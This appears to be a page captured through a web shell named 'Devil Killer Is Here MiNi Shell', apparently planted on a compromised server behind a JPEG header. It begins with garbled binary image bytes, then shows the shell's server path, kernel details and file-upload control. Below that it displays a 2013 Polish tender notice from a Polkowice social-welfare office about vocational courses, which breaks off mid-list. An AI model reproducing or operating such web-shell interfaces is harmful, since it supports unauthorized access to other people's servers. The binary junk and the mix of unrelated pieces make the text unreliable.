JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130716/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130716/277966-N-2013.html

<p class="kh_header"><b>Polkowice: Organizacja i przeprowadzenie szkoleń zawodowych  w ramach projektu systemowego pn: Projekt Nowe umiejętności - nowe możliwości aktywizujący osoby korzystające ze wsparcia Ośrodka Pomocy Społecznej w Polkowicach.</b><br>
<b>Numer ogłoszenia: 277966 - 2013; data zamieszczenia: 16.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Lipowa 2, 59-100 Polkowice, woj. dolnośląskie, tel. 0-76 7246700, 7246704, faks 0-76 7246703.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń zawodowych  w ramach projektu systemowego pn: Projekt Nowe umiejętności - nowe możliwości aktywizujący osoby korzystające ze wsparcia Ośrodka Pomocy Społecznej w Polkowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Organizacja i przeprowadzenie  szkoleń zawodowych wraz z przygotowaniem materiałów szkoleniowych, baru kawowego, ciepłego posiłku, ubezpieczenia, zwrotu kosztów dojazdu z miejsca zamieszkania na miejsce odbywania się zajęć oraz z miejsca odbycia się zajęć  do miejsca zamieszkania w ramach projektu systemowego pn: Projekt Nowe umiejętności - nowe możliwości aktywizujący osoby korzystające ze wsparcia Ośrodka Pomocy Społecznej w Polkowicach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 25.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części I:
Należy wykazać należytą realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, jako usług najważniejszych, zorganizowanie i przeprowadzenie co najmniej trzech szkoleń zawodowych na zlecenie zewnętrznych w stosunku do Wykonawcy podmiotów o charakterze i złożoności zbliżonej z zakresem przedmiotowym niniejszego zamówienia z zakresu: kurs: Pomocnik kucharza, kurs gastronomiczny z obsługą kasy fiskalnej, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. 
Dla Części II:
Należy wykazać należytą realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, jako usług najważniejszych, zorganizowanie i przeprowadzenie co najmniej trzech szkoleń zawodowych na zlecenie zewnętrznych w stosunku do Wykonawcy podmiotów o charakterze i złożoności zbliżonej z zakresem przedmiotowym niniejszego zamówienia z zakresu: kurs: Opiekun Osoby starszej i niepełnosprawnej, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Dla Części III:
Należy wykazać należytą realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, jako usług najważniejszych, zorganizowanie i przeprowadzenie co najmniej trzech szkoleń zawodowych na zlecenie zewnętrznych w stosunku do Wykonawcy podmiotów o charakterze i złożoności zbliżonej z zakresem przedmiotowym niniejszego zamówienia z zakresu: kurs: Pracownik hurtowni i magazynów wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Dla Części IV:
Należy wykazać należytą realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, jako usług najważniejszych, zorganizowanie i przeprowadzenie co najmniej trzech szkoleń zawodowych na zlecenie zewnętrznych w stosunku do Wykonawcy podmiotów o charakterze i złożoności zbliżonej z zakresem przedmiotowym niniejszego zamówienia z zakresu: kurs: Spawania rur i blach elektrodą otuloną-spoiny pachwinowe wraz z Kursem gazowego spawania blach wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla Części I; II; III; IV;  - załącznik numer 6A , 6B, 6C, 6D.
Należy wykazać dysponowanie osobami, które będą uczestniczyć w wykonaniu przedmiotowego zamówienia posiadającymi odpowiednie wykształcenie, umiejętności i doświadczenie dostosowane do tematyki szkoleń zawodowych dla każdej z części realizowanego zamówienia (min. 1 trener na grupę). Wymagane jest doświadczenie trenerów w prowadzeniu szkoleń o charakterze podobnym do przedmiotu zamówienia z zakresu odpowiedniego dla każdej z części realizowanego postępowania. Wykonawca powinien posiadać również min. dwuosobowe zaplecze kadrowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy wykazać posiadanie opłaconej polisy (polisy wraz z dowodem uiszczenia należnych składek), a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 70.000,00 zł. Ubezpieczenie powinno być ważne przez cały okres realizacji umowy, w przypadku, kiedy ubezpieczenie będzie wygasać w trakcie realizacji umowy, wykonawca dołączy do oferty oświadczenie, mocą którego zobowiąże się do przedłużenia ubezpieczenia po jego wygaśnięciu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oświadczenie o wykonaniu przedmiotu zamówienia zgodnie z wymaganiami Zamawiającego określonymi w SIWZ oraz w projekcie umowy (załącznik nr 4 do Formularza ofertowego);
b)	Pełnomocnictwo wystawione dla osoby składającej ofertę, podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika;
c)	W przypadku składania oferty przez podmioty występujące wspólnie, do oferty musi być dołączony dokument ustanawiający przez Wykonawców chcących startować wspólnie wspólnego pełnomocnika;
d)	W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie i dokumenty wymienione w pkt IV. 1.1. SIWZ mają potwierdzać spełnianie warunków udziału w postępowaniu określonych w pkt III. 1. SIWZ przez jednego Wykonawcę lub przez Wykonawców wspólnie, natomiast oświadczenia i dokumenty wymienione w pkt IV. 1.2. SIWZ mają potwierdzać brak podstaw do wykluczenia z postępowania w stosunku do każdego z Wykonawców składających ofertę wspólną.
d)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. 
W przypadku kiedy Wykonawca powoła się na wiedzę i doświadczenie innego podmiotu, oświadczenie tego podmiotu zawierać winno zobowiązanie do udziału w wykonywaniu części udzielanego zamówienia w zakresie udostępnionego Wykonawcy zasobów;
e)	W przypadku składania oferty przez przedsiębiorcę występującego jako spółka cywilna zaleca się załączenie umowy spółki cywilnej, celem ustalenia osób uprawnionych do reprezentowania spółki;
f)	Zamawiający wymaga aby Wykonawca był wpisany do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy na dowód powinien przedłożyć oświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy (Załącznik nr 8) właściwy ze względu na siedzibę instytucji szkoleniowej, zgodnie z art. 20 ust. 1 ustawy z dnia 13 czerwca 2013 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. 2013 nr 0 poz. 674).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wystąpienia istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującej sytuacji:
1.	Zamawiający zastrzega sobie prawo odstąpienia od umowy w przypadku gdy Urząd Marszałkowski Województwa Dolnośląskiego (Instytucja Wdrażająca / Pośrednicząca II stopnia) odstąpi od umowy o dofinansowanie Projektu, o którym mowa w § 1 ust. 4, w całości lub w jego części.
2.	Zamawiający zastrzega sobie prawo do:
-	kontroli przebiegu i sposobu prowadzenia szkolenia,
-	niezwłocznego rozwiązania umowy (w terminie 7 dni) w razie nienależytego jej wykonania przez Wykonawcę po uprzednim pisemnym zawiadomieniu o stwierdzonych nieprawidłowościach i braku przedstawienia zadowalającego wyjaśnienia tych nieprawidłowości.
3.	Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
4.	Dopuszcza się zmianę przedstawicieli stron z przyczyn niezależnych od stron (siły wyższe, zdarzenia losowe itp.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.ops.polkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Polkowicach, ul. Lipowa 2, 59-100 Polkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Polkowicach, ul. Lipowa 2, 59-100 Polkowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Nowe umiejętności - nowe możliwości aktywizujący osoby korzystające ze wsparcia Ośrodka Pomocy Społecznej w Polkowicach. Projekt jest współfinansowany ze środków przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs  Kucharz małej gastronomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szkolenie przeznaczone jest dla 8  osób (-/+2 osoby) 
2.	Celem szkolenia jest nabycie przez uczestników szkolenia wiedzy teoretycznej 
i umiejętności praktycznych niezbędnych do pracy na stanowisku kucharza małej gastronomii z odpowiednimi kwalifikacjami zawodowymi.
3.	Organizacja szkolenia:
1)	Szkolenie musi zostać przeprowadzone dla 8  osób (-/+2 osoby)  w jednej grupie, z zastrzeżeniem, że Wykonawca zobowiązany będzie do uruchomienia szkolenia przy skierowaniu przez Zamawiającego co najmniej 6 osób w grupie.
2)	Zajęcia muszą odbywać się codziennie, z wyjątkiem sobót i niedziel oraz dni ustawowo wolnych od pracy; czas trwania szkolenia w ciągu jednego dnia nie może przekraczać 6 godzin zegarowych. Harmonogram musi zakładać taką samą liczbę godzin zajęć dziennie dla każdego uczestnika szkolenia.
3)	Przez godzinę zegarową kursu Zamawiający rozumie 60 minut zegarowych obejmujące zajęcia edukacyjne/ praktyczne w wymiarze 45 minut oraz 15 minutową przerwę; Zamawiający nie dopuszcza kumulowania przerw w szczególności na zakończenie dnia zajęć. 
4)	Łączny czas szkolenia wynosi 120 godzin zegarowych, co stanowi, że szkolenie musi trwać ok 24 dni.
5)	Szkolenie musi się odbywać się w : Polkowice/ Lubin lub Głogów
6)	Wykonawca dla celów realizacji szkolenia musi dysponować:
a.	8 kasami fiskalnymi, z czego min. 2 - różnej marki/producenta i terminalem płatniczym,
b.	odpowiednią ilością produktów żywnościowych, sprzętu, przyborów gastronomicznych, narzędzi i urządzeń gastronomicznych o stanie technicznym zapewniającym odpowiedni poziom szkolenia.
7)	Wykonawca dla celów realizacji szkolenia zobowiązany jest zapewnić:
Odpowiednio wyposażoną salę dydaktyczną, adekwatną dla grupy ośmioosobowej,  z osobnymi miejscami dla każdego uczestnika szkolenia z odpowiednim oświetleniem, ogrzewaniem, wentylacją i akustyką oraz spełniającą wszystkie wymogi określone przepisami z zakresu BHP - dla części teoretycznej szkolenia.
a.	pracownię gastronomiczną (pracownie gastronomiczne) dla grupy ośmioosobowej - wyposażoną, odpowiednio dla zakresu szkolenia, w sprzęt i urządzenia gastronomiczne i spełniającą(e) wymagania sanitarno-epidemiologiczne  - dla części teoretyczno - warsztatowej szkolenia.
b.	odzież ochronną dla każdego uczestnika szkolenia 
8)	Zamawiający wymaga, aby zajęcia przewidziane do realizacji Modułu V były przeprowadzone w zakładach gastronomicznych, stołówkach, restauracjach, firmach cateringowych itp. pod nadzorem opiekunów (instruktorów) zajęć praktycznych, Zamawiający wymaga 1 opiekuna (instruktora) w każdym miejscu realizacji Modułu V.
9)	Wykaz miejsc, w których będzie przeprowadzony Moduł V oraz wykaz opiekunów zajęć praktycznych (instruktorów) Wykonawca przedstawi Zamawiającemu najpóźniej przed upływem piątego dnia trwania szkolenia. Przy wyborze miejsc odbywania zajęć praktycznych Wykonawca, 
w miarę możliwości, uwzględni miejsce zamieszkania osoby skierowanej.
10)	Wykonawca zobowiąże opiekunów zajęć praktycznych (instruktorów) do prowadzenia Indywidualnej Karty Zajęć Praktycznych każdego uczestnika szkolenia.
11)	Wykonawca zobowiązany jest do uruchomienia szkolenia w terminie    wyznaczonym przez Zamawiającego.
12)	Termin zakończenia realizacji całości zamówienia: 31 października 2013 roku.
4.	Program szkolenia
1)	Szkolenie musi odbywać się w formie kursu realizowanego według planu nauczania obejmującego przeciętnie ok. 25 godzin zegarowych w tygodniu.
2)	Program szkolenia musi zawierać: 
a)	nazwę i zakres szkolenia, 
b)	czas trwania i sposób organizacji szkolenia, 
c)	wymagania wstępne dla uczestników szkolenia, 
d)	cele szkolenia, 
e)	plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, 
z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej, 
f)	opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
g)	wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 
h)	przewidziane sprawdziany i egzaminy,
3)	Wykonawca musi wykorzystać standardy kwalifikacji zawodowych 
i modułowych programów szkoleń zawodowych, dostępnych w bazach danych, 
o których mowa w § 74 ust. 1 pkt 2 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 roku w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. z 2010 r. Nr 177, poz. 1193 z późn. zm.)- udowadniając odpowiednim oświadczeniem wykonawcy. 
4)	Zakres tematyczny szkolenia musi składać się z następujących modułów:
a)	Moduł I - zajęcia teoretyczno-warsztatowe: 
-	organizacja stanowiska i miejsca pracy zgodnie z zasadami BHP,
-	obsługa narzędzi, maszyn i urządzeń, które stanowią wyposażenie placówek gastronomicznych,
-	charakterystyka procesów technologicznych,
-	receptury gastronomiczne - przepisy kulinarne,
-	stosowanie zasad prawidłowego żywienia, 
-	zestawianie potraw w posiłki - śniadanie, obiad, kolacja, 
-	planowanie posiłków i układanie prostego menu w małej gastronomii, 
-	obróbka wstępna produktów - mięs, warzyw, nabiału, 
-	obróbka termiczna produktów,
-	dokonywanie oceny jakościowej surowców, półproduktów i gotowych potraw, 
-	trendy w zakresie sporządzania receptur potraw i posługiwanie się nimi podczas wykonywania potraw, 
-	zastosowanie nowoczesnych form przygotowania potraw dla obniżenia ich kosztów tworzenia, 

b)	Moduł II - organizowanie imprez okolicznościowych: 
organizacja usługi cateringowej zgodnie z przepisami i zasadami bezpieczeństwa i higieny pracy,
-	organizacja, planowanie i przeprowadzenie usług cateringowych w tym m.in.: bankietów, konferencji, szkoleń, imprez okolicznościowych, wesel, komunii, imprez plenerowych, firmowych, 
-	aranżacje i prezentacje potraw, 
-	projektowanie i organizacja imprez, 
-	opracowywanie cen i kosztorysów usług cateringowych oraz ich rozliczanie, 
-	dobór napojów alkoholowych do potraw, zasady sporządzania 
i serwowania napojów zimnych, 
-	zasady przewozu wyrobów kulinarnych, 
